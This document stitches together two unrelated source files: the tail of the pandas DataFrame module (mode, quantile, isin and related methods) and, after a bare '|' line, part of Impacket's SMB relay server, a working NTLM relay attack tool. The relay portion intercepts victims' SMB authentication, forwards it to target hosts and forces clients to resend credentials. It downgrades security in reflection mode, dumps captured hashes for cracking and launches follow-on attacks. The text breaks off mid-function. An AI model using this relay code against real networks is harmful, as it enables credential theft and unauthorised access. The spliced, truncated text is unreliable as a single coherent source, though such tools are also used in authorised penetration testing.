indices = nanops.nanargmax(self.values, axis=axis, skipna=skipna)
# indices will always be np.ndarray since axis is not None and
# values is a 2d array for DataFrame
# error: Item "int" of "Union[int, Any]" has no attribute "__iter__"
assert isinstance(indices, np.ndarray) # for mypy
index = self._get_axis(axis)
result = [index[i] if i >= 0 else np.nan for i in indices]
return self._constructor_sliced(result, index=self._get_agg_axis(axis))
def _get_agg_axis(self, axis_num: int) -> Index:
"""
Let's be explicit about this.
"""
if axis_num == 0:
return self.columns
elif axis_num == 1:
return self.index
else:
raise ValueError(f"Axis must be 0 or 1 (got {repr(axis_num)})")
def mode(self, axis=0, numeric_only=False, dropna=True) -> DataFrame:
"""
Get the mode(s) of each element along the selected axis.
The mode of a set of values is the value that appears most often.
It can be multiple values.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to iterate over while searching for the mode:
* 0 or 'index' : get mode of each column
* 1 or 'columns' : get mode of each row.
numeric_only : bool, default False
If True, only apply to numeric columns.
dropna : bool, default True
Don't consider counts of NaN/NaT.
.. versionadded:: 0.24.0
Returns
-------
DataFrame
The modes of each column or row.
See Also
--------
Series.mode : Return the highest frequency value in a Series.
Series.value_counts : Return the counts of values in a Series.
Examples
--------
>>> df = pd.DataFrame([('bird', 2, 2),
... ('mammal', 4, np.nan),
... ('arthropod', 8, 0),
... ('bird', 2, np.nan)],
... index=('falcon', 'horse', 'spider', 'ostrich'),
... columns=('species', 'legs', 'wings'))
>>> df
species legs wings
falcon bird 2 2.0
horse mammal 4 NaN
spider arthropod 8 0.0
ostrich bird 2 NaN
By default, missing values are not considered, and the mode of wings
are both 0 and 2. The second row of species and legs contains ``NaN``,
because they have only one mode, but the DataFrame has two rows.
>>> df.mode()
species legs wings
0 bird 2.0 0.0
1 NaN NaN 2.0
Setting ``dropna=False`` ``NaN`` values are considered and they can be
the mode (like for wings).
>>> df.mode(dropna=False)
species legs wings
0 bird 2 NaN
Setting ``numeric_only=True``, only the mode of numeric columns is
computed, and columns of other types are ignored.
>>> df.mode(numeric_only=True)
legs wings
0 2.0 0.0
1 NaN 2.0
To compute the mode over columns and not rows, use the axis parameter:
>>> df.mode(axis='columns', numeric_only=True)
0 1
falcon 2.0 NaN
horse 4.0 NaN
spider 0.0 8.0
ostrich 2.0 NaN
"""
data = self if not numeric_only else self._get_numeric_data()
def f(s):
return s.mode(dropna=dropna)
return data.apply(f, axis=axis)
def quantile(self, q=0.5, axis=0, numeric_only=True, interpolation="linear"):
"""
Return values at the given quantile over requested axis.
Parameters
----------
q : float or array-like, default 0.5 (50% quantile)
Value between 0 <= q <= 1, the quantile(s) to compute.
axis : {0, 1, 'index', 'columns'}, default 0
Equals 0 or 'index' for row-wise, 1 or 'columns' for column-wise.
numeric_only : bool, default True
If False, the quantile of datetime and timedelta data will be
computed as well.
interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'}
This optional parameter specifies the interpolation method to use,
when the desired quantile lies between two data points `i` and `j`:
* linear: `i + (j - i) * fraction`, where `fraction` is the
fractional part of the index surrounded by `i` and `j`.
* lower: `i`.
* higher: `j`.
* nearest: `i` or `j` whichever is nearest.
* midpoint: (`i` + `j`) / 2.
Returns
-------
Series or DataFrame
If ``q`` is an array, a DataFrame will be returned where the
index is ``q``, the columns are the columns of self, and the
values are the quantiles.
If ``q`` is a float, a Series will be returned where the
index is the columns of self and the values are the quantiles.
See Also
--------
core.window.Rolling.quantile: Rolling quantile.
numpy.percentile: Numpy function to compute the percentile.
Examples
--------
>>> df = pd.DataFrame(np.array([[1, 1], [2, 10], [3, 100], [4, 100]]),
... columns=['a', 'b'])
>>> df.quantile(.1)
a 1.3
b 3.7
Name: 0.1, dtype: float64
>>> df.quantile([.1, .5])
a b
0.1 1.3 3.7
0.5 2.5 55.0
Specifying `numeric_only=False` will also compute the quantile of
datetime and timedelta data.
>>> df = pd.DataFrame({'A': [1, 2],
... 'B': [pd.Timestamp('2010'),
... pd.Timestamp('2011')],
... 'C': [pd.Timedelta('1 days'),
... pd.Timedelta('2 days')]})
>>> df.quantile(0.5, numeric_only=False)
A 1.5
B 2010-07-02 12:00:00
C 1 days 12:00:00
Name: 0.5, dtype: object
"""
validate_percentile(q)
data = self._get_numeric_data() if numeric_only else self
axis = self._get_axis_number(axis)
is_transposed = axis == 1
if is_transposed:
data = data.T
if len(data.columns) == 0:
# GH#23925 _get_numeric_data may have dropped all columns
cols = Index([], name=self.columns.name)
if is_list_like(q):
return self._constructor([], index=q, columns=cols)
return self._constructor_sliced([], index=cols, name=q, dtype=np.float64)
result = data._mgr.quantile(
qs=q, axis=1, interpolation=interpolation, transposed=is_transposed
)
if result.ndim == 2:
result = self._constructor(result)
else:
result = self._constructor_sliced(result, name=q)
if is_transposed:
result = result.T
return result
def to_timestamp(
self, freq=None, how: str = "start", axis: Axis = 0, copy: bool = True
) -> DataFrame:
"""
Cast to DatetimeIndex of timestamps, at *beginning* of period.
Parameters
----------
freq : str, default frequency of PeriodIndex
Desired frequency.
how : {'s', 'e', 'start', 'end'}
Convention for converting period to timestamp; start of period
vs. end.
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to convert (the index by default).
copy : bool, default True
If False then underlying input data is not copied.
Returns
-------
DataFrame with DatetimeIndex
"""
new_obj = self.copy(deep=copy)
axis_name = self._get_axis_name(axis)
old_ax = getattr(self, axis_name)
new_ax = old_ax.to_timestamp(freq=freq, how=how)
setattr(new_obj, axis_name, new_ax)
return new_obj
def to_period(self, freq=None, axis: Axis = 0, copy: bool = True) -> DataFrame:
"""
Convert DataFrame from DatetimeIndex to PeriodIndex.
Convert DataFrame from DatetimeIndex to PeriodIndex with desired
frequency (inferred from index if not passed).
Parameters
----------
freq : str, default
Frequency of the PeriodIndex.
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to convert (the index by default).
copy : bool, default True
If False then underlying input data is not copied.
Returns
-------
DataFrame with PeriodIndex
"""
new_obj = self.copy(deep=copy)
axis_name = self._get_axis_name(axis)
old_ax = getattr(self, axis_name)
new_ax = old_ax.to_period(freq=freq)
setattr(new_obj, axis_name, new_ax)
return new_obj
def isin(self, values) -> DataFrame:
"""
Whether each element in the DataFrame is contained in values.
Parameters
----------
values : iterable, Series, DataFrame or dict
The result will only be true at a location if all the
labels match. If `values` is a Series, that's the index. If
`values` is a dict, the keys must be the column names,
which must match. If `values` is a DataFrame,
then both the index and column labels must match.
Returns
-------
DataFrame
DataFrame of booleans showing whether each element in the DataFrame
is contained in values.
See Also
--------
DataFrame.eq: Equality test for DataFrame.
Series.isin: Equivalent method on Series.
Series.str.contains: Test if pattern or regex is contained within a
string of a Series or Index.
Examples
--------
>>> df = pd.DataFrame({'num_legs': [2, 4], 'num_wings': [2, 0]},
... index=['falcon', 'dog'])
>>> df
num_legs num_wings
falcon 2 2
dog 4 0
When ``values`` is a list check whether every value in the DataFrame
is present in the list (which animals have 0 or 2 legs or wings)
>>> df.isin([0, 2])
num_legs num_wings
falcon True True
dog False True
When ``values`` is a dict, we can pass values to check for each
column separately:
>>> df.isin({'num_wings': [0, 3]})
num_legs num_wings
falcon False False
dog False True
When ``values`` is a Series or DataFrame the index and column must
match. Note that 'falcon' does not match based on the number of legs
in df2.
>>> other = pd.DataFrame({'num_legs': [8, 2], 'num_wings': [0, 2]},
... index=['spider', 'falcon'])
>>> df.isin(other)
num_legs num_wings
falcon True True
dog False False
"""
if isinstance(values, dict):
from pandas.core.reshape.concat import concat
values = collections.defaultdict(list, values)
return concat(
(
self.iloc[:, [i]].isin(values[col])
for i, col in enumerate(self.columns)
),
axis=1,
)
elif isinstance(values, Series):
if not values.index.is_unique:
raise ValueError("cannot compute isin with a duplicate axis.")
return self.eq(values.reindex_like(self), axis="index")
elif isinstance(values, DataFrame):
if not (values.columns.is_unique and values.index.is_unique):
raise ValueError("cannot compute isin with a duplicate axis.")
return self.eq(values.reindex_like(self))
else:
if not is_list_like(values):
raise TypeError(
"only list-like or dict-like objects are allowed "
"to be passed to DataFrame.isin(), "
f"you passed a '{type(values).__name__}'"
)
return self._constructor(
algorithms.isin(self.values.ravel(), values).reshape(self.shape),
self.index,
self.columns,
)
# ----------------------------------------------------------------------
# Add index and columns
_AXIS_ORDERS = ["index", "columns"]
_AXIS_TO_AXIS_NUMBER: Dict[Axis, int] = {
**NDFrame._AXIS_TO_AXIS_NUMBER,
1: 1,
"columns": 1,
}
_AXIS_REVERSED = True
_AXIS_LEN = len(_AXIS_ORDERS)
_info_axis_number = 1
_info_axis_name = "columns"
index: Index = properties.AxisProperty(
axis=1, doc="The index (row labels) of the DataFrame."
)
columns: Index = properties.AxisProperty(
axis=0, doc="The column labels of the DataFrame."
)
@property
def _AXIS_NUMBERS(self) -> Dict[str, int]:
""".. deprecated:: 1.1.0"""
super()._AXIS_NUMBERS
return {"index": 0, "columns": 1}
@property
def _AXIS_NAMES(self) -> Dict[int, str]:
""".. deprecated:: 1.1.0"""
super()._AXIS_NAMES
return {0: "index", 1: "columns"}
# ----------------------------------------------------------------------
# Add plotting methods to DataFrame
plot = CachedAccessor("plot", pandas.plotting.PlotAccessor)
hist = pandas.plotting.hist_frame
boxplot = pandas.plotting.boxplot_frame
sparse = CachedAccessor("sparse", SparseFrameAccessor)
DataFrame._add_numeric_operations()
ops.add_flex_arithmetic_methods(DataFrame)
ops.add_special_arithmetic_methods(DataFrame)
def _from_nested_dict(data) -> collections.defaultdict:
new_data: collections.defaultdict = collections.defaultdict(dict)
for index, s in data.items():
for col, v in s.items():
new_data[col][index] = v
return new_data
|
# Impacket - Collection of Python classes for working with network protocols.
#
# SECUREAUTH LABS. Copyright (C) 2020 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
# SMB Relay Server
#
# This is the SMB server which relays the connections
# to other protocols
#
# Authors:
# Alberto Solino (@agsolino)
# Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
#
from __future__ import division
from __future__ import print_function
from threading import Thread
try:
import ConfigParser
except ImportError:
import configparser as ConfigParser
import struct
import logging
import time
import calendar
import random
import string
import socket
import ntpath
from binascii import hexlify, unhexlify
from six import b
from impacket import smb, ntlm, LOG, smb3
from impacket.nt_errors import STATUS_MORE_PROCESSING_REQUIRED, STATUS_ACCESS_DENIED, STATUS_SUCCESS, STATUS_NETWORK_SESSION_EXPIRED
from impacket.spnego import SPNEGO_NegTokenResp, SPNEGO_NegTokenInit, TypesMech
from impacket.smbserver import SMBSERVER, outputToJohnFormat, writeJohnOutputToFile
from impacket.spnego import ASN1_AID, MechTypes, ASN1_SUPPORTED_MECH
from impacket.examples.ntlmrelayx.servers.socksserver import activeConnections
from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor
from impacket.smbserver import getFileTime, decodeSMBString, encodeSMBString
class SMBRelayServer(Thread):
def __init__(self,config):
Thread.__init__(self)
self.daemon = True
self.server = 0
#Config object
self.config = config
#Current target IP
self.target = None
#Targets handler
self.targetprocessor = self.config.target
#Username we auth as gets stored here later
self.authUser = None
self.proxyTranslator = None
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','server_name')
smbConfig.set('global','server_os','UNIX')
smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global','log_file','smb.log')
smbConfig.set('global','credentials_file','')
if self.config.smb2support is True:
smbConfig.set("global", "SMB2Support", "True")
else:
smbConfig.set("global", "SMB2Support", "False")
if self.config.outputFile is not None:
smbConfig.set('global','jtr_dump_path',self.config.outputFile)
if self.config.SMBServerChallenge is not None:
smbConfig.set('global', 'challenge', self.config.SMBServerChallenge)
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path','')
# Change address_family to IPv6 if this is configured
if self.config.ipv6:
SMBSERVER.address_family = socket.AF_INET6
# changed to dereference configuration interfaceIp
if self.config.listeningPort:
smbport = self.config.listeningPort
else:
smbport = 445
self.server = SMBSERVER((config.interfaceIp,smbport), config_parser = smbConfig)
logging.getLogger('impacket.smbserver').setLevel(logging.CRITICAL)
self.server.processConfigFile()
self.origSmbComNegotiate = self.server.hookSmbCommand(smb.SMB.SMB_COM_NEGOTIATE, self.SmbComNegotiate)
self.origSmbSessionSetupAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX, self.SmbSessionSetupAndX)
self.origsmbComTreeConnectAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX, self.smbComTreeConnectAndX)
self.origSmbNegotiate = self.server.hookSmb2Command(smb3.SMB2_NEGOTIATE, self.SmbNegotiate)
self.origSmbSessionSetup = self.server.hookSmb2Command(smb3.SMB2_SESSION_SETUP, self.SmbSessionSetup)
self.origsmb2TreeConnect = self.server.hookSmb2Command(smb3.SMB2_TREE_CONNECT, self.smb2TreeConnect)
# Let's use the SMBServer Connection dictionary to keep track of our client connections as well
#TODO: See if this is the best way to accomplish this
# changed to dereference configuration interfaceIp
self.server.addConnection('SMBRelay', config.interfaceIp, 445)
### SMBv2 Part #################################################################
def SmbNegotiate(self, connId, smbServer, recvPacket, isSMB1=False):
connData = smbServer.getConnectionData(connId, checkStatus=False)
respPacket = smb3.SMB2Packet()
respPacket['Flags'] = smb3.SMB2_FLAGS_SERVER_TO_REDIR
respPacket['Status'] = STATUS_SUCCESS
respPacket['CreditRequestResponse'] = 1
respPacket['Command'] = smb3.SMB2_NEGOTIATE
respPacket['SessionID'] = 0
if isSMB1 is False:
respPacket['MessageID'] = recvPacket['MessageID']
else:
respPacket['MessageID'] = 0
respPacket['TreeID'] = 0
respSMBCommand = smb3.SMB2Negotiate_Response()
# Just for the Nego Packet, then disable it
respSMBCommand['SecurityMode'] = smb3.SMB2_NEGOTIATE_SIGNING_ENABLED
if isSMB1 is True:
# Let's first parse the packet to see if the client supports SMB2
SMBCommand = smb.SMBCommand(recvPacket['Data'][0])
dialects = SMBCommand['Data'].split(b'\x02')
if b'SMB 2.002\x00' in dialects or b'SMB 2.???\x00' in dialects:
respSMBCommand['DialectRevision'] = smb3.SMB2_DIALECT_002
#respSMBCommand['DialectRevision'] = smb3.SMB2_DIALECT_21
else:
# Client does not support SMB2 fallbacking
raise Exception('Client does not support SMB2, fallbacking')
else:
respSMBCommand['DialectRevision'] = smb3.SMB2_DIALECT_002
#respSMBCommand['DialectRevision'] = smb3.SMB2_DIALECT_21
respSMBCommand['ServerGuid'] = b(''.join([random.choice(string.ascii_letters) for _ in range(16)]))
respSMBCommand['Capabilities'] = 0
respSMBCommand['MaxTransactSize'] = 65536
respSMBCommand['MaxReadSize'] = 65536
respSMBCommand['MaxWriteSize'] = 65536
respSMBCommand['SystemTime'] = getFileTime(calendar.timegm(time.gmtime()))
respSMBCommand['ServerStartTime'] = getFileTime(calendar.timegm(time.gmtime()))
respSMBCommand['SecurityBufferOffset'] = 0x80
blob = SPNEGO_NegTokenInit()
blob['MechTypes'] = [TypesMech['NEGOEX - SPNEGO Extended Negotiation Security Mechanism'],
TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']]
respSMBCommand['Buffer'] = blob.getData()
respSMBCommand['SecurityBufferLength'] = len(respSMBCommand['Buffer'])
respPacket['Data'] = respSMBCommand
smbServer.setConnectionData(connId, connData)
return None, [respPacket], STATUS_SUCCESS
def SmbSessionSetup(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
#############################################################
# SMBRelay
# Are we ready to relay or should we just do local auth?
if 'relayToHost' not in connData:
# Just call the original SessionSetup
respCommands, respPackets, errorCode = self.origSmbSessionSetup(connId, smbServer, recvPacket)
# We remove the Guest flag
if 'SessionFlags' in respCommands[0].fields:
respCommands[0]['SessionFlags'] = 0x00
return respCommands, respPackets, errorCode
# We have confirmed we want to relay to the target host.
respSMBCommand = smb3.SMB2SessionSetup_Response()
sessionSetupData = smb3.SMB2SessionSetup(recvPacket['Data'])
connData['Capabilities'] = sessionSetupData['Capabilities']
securityBlob = sessionSetupData['Buffer']
rawNTLM = False
if struct.unpack('B',securityBlob[0:1])[0] == ASN1_AID:
# NEGOTIATE packet
blob = SPNEGO_NegTokenInit(securityBlob)
token = blob['MechToken']
if len(blob['MechTypes'][0]) > 0:
# Is this GSSAPI NTLM or something else we don't support?
mechType = blob['MechTypes'][0]
if mechType != TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider'] and \
mechType != TypesMech['NEGOEX - SPNEGO Extended Negotiation Security Mechanism']:
# Nope, do we know it?
if mechType in MechTypes:
mechStr = MechTypes[mechType]
else:
mechStr = hexlify(mechType)
smbServer.log("Unsupported MechType '%s'" % mechStr, logging.CRITICAL)
# We don't know the token, we answer back again saying
# we just support NTLM.
respToken = SPNEGO_NegTokenResp()
respToken['NegState'] = b'\x03' # request-mic
respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken = respToken.getData()
respSMBCommand['SecurityBufferOffset'] = 0x48
respSMBCommand['SecurityBufferLength'] = len(respToken)
respSMBCommand['Buffer'] = respToken
return [respSMBCommand], None, STATUS_MORE_PROCESSING_REQUIRED
elif struct.unpack('B',securityBlob[0:1])[0] == ASN1_SUPPORTED_MECH:
# AUTH packet
blob = SPNEGO_NegTokenResp(securityBlob)
token = blob['ResponseToken']
else:
# No GSSAPI stuff, raw NTLMSSP
rawNTLM = True
token = securityBlob
# Here we only handle NTLMSSP, depending on what stage of the
# authentication we are, we act on it
messageType = struct.unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 0x01:
# NEGOTIATE_MESSAGE
negotiateMessage = ntlm.NTLMAuthNegotiate()
negotiateMessage.fromString(token)
# Let's store it in the connection data
connData['NEGOTIATE_MESSAGE'] = negotiateMessage
#############################################################
# SMBRelay: Ok.. So we got a NEGOTIATE_MESSAGE from a client.
# Let's send it to the target server and send the answer back to the client.
client = connData['SMBClient']
try:
challengeMessage = self.do_ntlm_negotiate(client, token)
except Exception as e:
LOG.debug("Exception:", exc_info=True)
# Log this target as processed for this client
self.targetprocessor.logTarget(self.target)
# Raise exception again to pass it on to the SMB server
raise
#############################################################
if rawNTLM is False:
respToken = SPNEGO_NegTokenResp()
# accept-incomplete. We want more data
respToken['NegState'] = b'\x01'
respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = challengeMessage.getData()
else:
respToken = challengeMessage
# Setting the packet to STATUS_MORE_PROCESSING
errorCode = STATUS_MORE_PROCESSING_REQUIRED
# Let's set up an UID for this connection and store it
# in the connection's data
connData['Uid'] = random.randint(1,0xffffffff)
connData['CHALLENGE_MESSAGE'] = challengeMessage
elif messageType == 0x02:
# CHALLENGE_MESSAGE
raise Exception('Challenge Message raise, not implemented!')
elif messageType == 0x03:
# AUTHENTICATE_MESSAGE, here we deal with authentication
#############################################################
# SMBRelay: Ok, so now the have the Auth token, let's send it
# back to the target system and hope for the best.
client = connData['SMBClient']
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '':
# For some attacks it is important to know the authenticated username, so we store it
self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper()
if rawNTLM is True:
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = securityBlob
securityBlob = respToken2.getData()
if self.config.remove_mic:
clientResponse, errorCode = self.do_ntlm_auth(client, token,
connData['CHALLENGE_MESSAGE']['challenge'])
else:
clientResponse, errorCode = self.do_ntlm_auth(client, securityBlob,
connData['CHALLENGE_MESSAGE']['challenge'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
#Log this target as processed for this client
self.targetprocessor.logTarget(self.target)
LOG.error("Authenticating against %s://%s as %s FAILED" % (self.target.scheme, self.target.netloc, self.authUser))
client.killConnection()
else:
# We have a session, create a thread and do whatever we want
LOG.info("Authenticating against %s://%s as %s SUCCEED" % (self.target.scheme, self.target.netloc, self.authUser))
# Log this target as processed for this client
self.targetprocessor.logTarget(self.target, True, self.authUser)
ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'], authenticateMessage['lanman'],
authenticateMessage['ntlm'])
client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
connData['Authenticated'] = True
del(connData['relayToHost'])
self.do_attack(client)
# Now continue with the server
#############################################################
if rawNTLM is False:
respToken = SPNEGO_NegTokenResp()
# accept-completed
respToken['NegState'] = b'\x00'
else:
respToken = ''
# Let's store it in the connection data
connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
else:
raise Exception("Unknown NTLMSSP MessageType %d" % messageType)
respSMBCommand['SecurityBufferOffset'] = 0x48
respSMBCommand['SecurityBufferLength'] = len(respToken)
if respSMBCommand['SecurityBufferLength'] > 0:
respSMBCommand['Buffer'] = respToken.getData()
else:
respSMBCommand['Buffer'] = ''
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def smb2TreeConnect(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
authenticateMessage = connData['AUTHENTICATE_MESSAGE']
self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode ('utf-16le'),
authenticateMessage['user_name'].decode ('utf-16le'))).upper ()
# Uncommenting this will stop at the first connection relayed and won't relaying until all targets
# are processed. There might be a use case for this
#if 'relayToHost' in connData:
# # Connection already relayed, let's just answer the request (that will return object not found)
# return self.origsmb2TreeConnect(connId, smbServer, recvPacket)
try:
if self.config.mode.upper () == 'REFLECTION':
self.targetprocessor = TargetsProcessor (singleTarget='SMB://%s:445/' % connData['ClientIP'])
if self.authUser == '/':
LOG.info('SMBD-%s: Connection from %s authenticated as guest (anonymous). Skipping target selection.' %
(connId, connData['ClientIP']))
return self.origsmb2TreeConnect (connId, smbServer, recvPacket)
self.target = self.targetprocessor.getTarget(identity = self.authUser)
if self.target is None:
# No more targets to process, just let the victim to fail later
LOG.info('SMBD-%s: Connection from %s@%s controlled, but there are no more targets left!' %
(connId, self.authUser, connData['ClientIP']))
return self.origsmb2TreeConnect (connId, smbServer, recvPacket)
LOG.info('SMBD-%s: Connection from %s@%s controlled, attacking target %s://%s' % (connId, self.authUser,
connData['ClientIP'], self.target.scheme, self.target.netloc))
if self.config.mode.upper() == 'REFLECTION':
# Force standard security when doing reflection
LOG.debug("Downgrading to standard security")
extSec = False
#recvPacket['Flags2'] += (~smb.SMB.FLAGS2_EXTENDED_SECURITY)
else:
extSec = True
# Init the correct client for our target
client = self.init_client(extSec)
except Exception as e:
LOG.error("Connection against target %s://%s FAILED: %s" % (self.target.scheme, self.target.netloc, str(e)))
self.targetprocessor.logTarget(self.target)
else:
connData['relayToHost'] = True
connData['Authenticated'] = False
del (connData['NEGOTIATE_MESSAGE'])
del (connData['CHALLENGE_MESSAGE'])
del (connData['AUTHENTICATE_MESSAGE'])
connData['SMBClient'] = client
connData['EncryptionKey'] = client.getStandardSecurityChallenge()
smbServer.setConnectionData(connId, connData)
respPacket = smb3.SMB2Packet()
respPacket['Flags'] = smb3.SMB2_FLAGS_SERVER_TO_REDIR
respPacket['Status'] = STATUS_SUCCESS
respPacket['CreditRequestResponse'] = 1
respPacket['Command'] = recvPacket['Command']
respPacket['SessionID'] = connData['Uid']
respPacket['Reserved'] = recvPacket['Reserved']
respPacket['MessageID'] = recvPacket['MessageID']
respPacket['TreeID'] = recvPacket['TreeID']
respSMBCommand = smb3.SMB2TreeConnect_Response()
# This is the key, force the client to reconnect.
# It will loop until all targets are processed for this user
errorCode = STATUS_NETWORK_SESSION_EXPIRED
respPacket['Status'] = errorCode
respSMBCommand['Capabilities'] = 0
respSMBCommand['MaximalAccess'] = 0x000f01ff
respPacket['Data'] = respSMBCommand
# Sign the packet if needed
if connData['SignatureEnabled']:
smbServer.signSMBv2(respPacket, connData['SigningSessionKey'])
smbServer.setConnectionData(connId, connData)
return None, [respPacket], errorCode
################################################################################
### SMBv1 Part #################################################################
def SmbComNegotiate(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
if (recvPacket['Flags2'] & smb.SMB.FLAGS2_EXTENDED_SECURITY) != 0:
if self.config.mode.upper() == 'REFLECTION':
# Force standard security when doing reflection
LOG.debug("Downgrading to standard security")
recvPacket['Flags2'] += (~smb.SMB.FLAGS2_EXTENDED_SECURITY)
return self.origSmbComNegotiate(connId, smbServer, SMBCommand, recvPacket)
#############################################################
def SmbSessionSetupAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
#############################################################
# SMBRelay
# Are we ready to relay or should we just do local auth?
if 'relayToHost' not in connData:
# Just call the original SessionSetup
return self.origSmbSessionSetupAndX(connId, smbServer, SMBCommand, recvPacket)
# We have confirmed we want to relay to the target host.
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)
if connData['_dialects_parameters']['Capabilities'] & smb.SMB.CAP_EXTENDED_SECURITY:
# Extended security. Here we deal with all SPNEGO stuff
respParameters = smb.SMBSessionSetupAndX_Extended_Response_Parameters()
respData = smb.SMBSessionSetupAndX_Extended_Response_Data()
sessionSetupParameters = smb.SMBSessionSetupAndX_Extended_Parameters(SMBCommand['Parameters'])
sessionSetupData = smb.SMBSessionSetupAndX_Extended_Data()
sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength']
sessionSetupData.fromString(SMBCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
rawNTLM = False
if struct.unpack('B',sessionSetupData['SecurityBlob'][0:1])[0] != ASN1_AID:
# If there no GSSAPI ID, it must be an AUTH packet
blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob'])
token = blob['ResponseToken']
else:
# NEGOTIATE packet
blob = SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob'])
token = blob['MechToken']
# Here we only handle NTLMSSP, depending on what stage of the
# authentication we are, we act on it
messageType = struct.unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 0x01:
# NEGOTIATE_MESSAGE
negotiateMessage = ntlm.NTLMAuthNegotiate()
negotiateMessage.fromString(token)
# Let's store it in the connection data
connData['NEGOTIATE_MESSAGE'] = negotiateMessage
#############################################################
# SMBRelay: Ok.. So we got a NEGOTIATE_MESSAGE from a client.
# Let's send it to the target server and send the answer back to the client.
client = connData['SMBClient']
try:
challengeMessage = self.do_ntlm_negotiate(client,token)
except Exception:
# Log this target as processed for this client
self.targetprocessor.logTarget(self.target)
# Raise exception again to pass it on to the SMB server
raise
#############################################################
respToken = SPNEGO_NegTokenResp()
# accept-incomplete. We want more data
respToken['NegState'] = b'\x01'
respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = challengeMessage.getData()
# Setting the packet to STATUS_MORE_PROCESSING
errorCode = STATUS_MORE_PROCESSING_REQUIRED
# Let's set up an UID for this connection and store it
# in the connection's data
# Picking a fixed value
# TODO: Manage more UIDs for the same session
connData['Uid'] = 10
connData['CHALLENGE_MESSAGE'] = challengeMessage
elif messageType == 0x03:
# AUTHENTICATE_MESSAGE, here we deal with authentication
#############################################################
# SMBRelay: Ok, so now the have the Auth token, let's send it
# back to the target system and hope for the best.
client = connData['SMBClient']
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '':
#For some attacks it is important to know the authenticated username, so we store it
self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper()
clientResponse, errorCode = self.do_ntlm_auth(client,sessionSetupData['SecurityBlob'],
connData['CHALLENGE_MESSAGE']['challenge'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = smb.NewSMBPacket()
packet['Flags1'] = smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
LOG.error("Authenticating against %s://%s as %s FAILED" % (self.target.scheme, self.target.netloc, self.authUser))
#Log this target as processed for this client
self.targetprocessor.logTarget(self.target)
client.killConnection()
return None, [packet], errorCode
else:
# We have a session, create a thread and do whatever we want
LOG.info("Authenticating against %s://%s as %s SUCCEED" % (self.target.scheme, self.target.netloc, self.authUser))
# Log this target as processed for this client
self.targetprocessor.logTarget(self.target, True, self.authUser)
ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
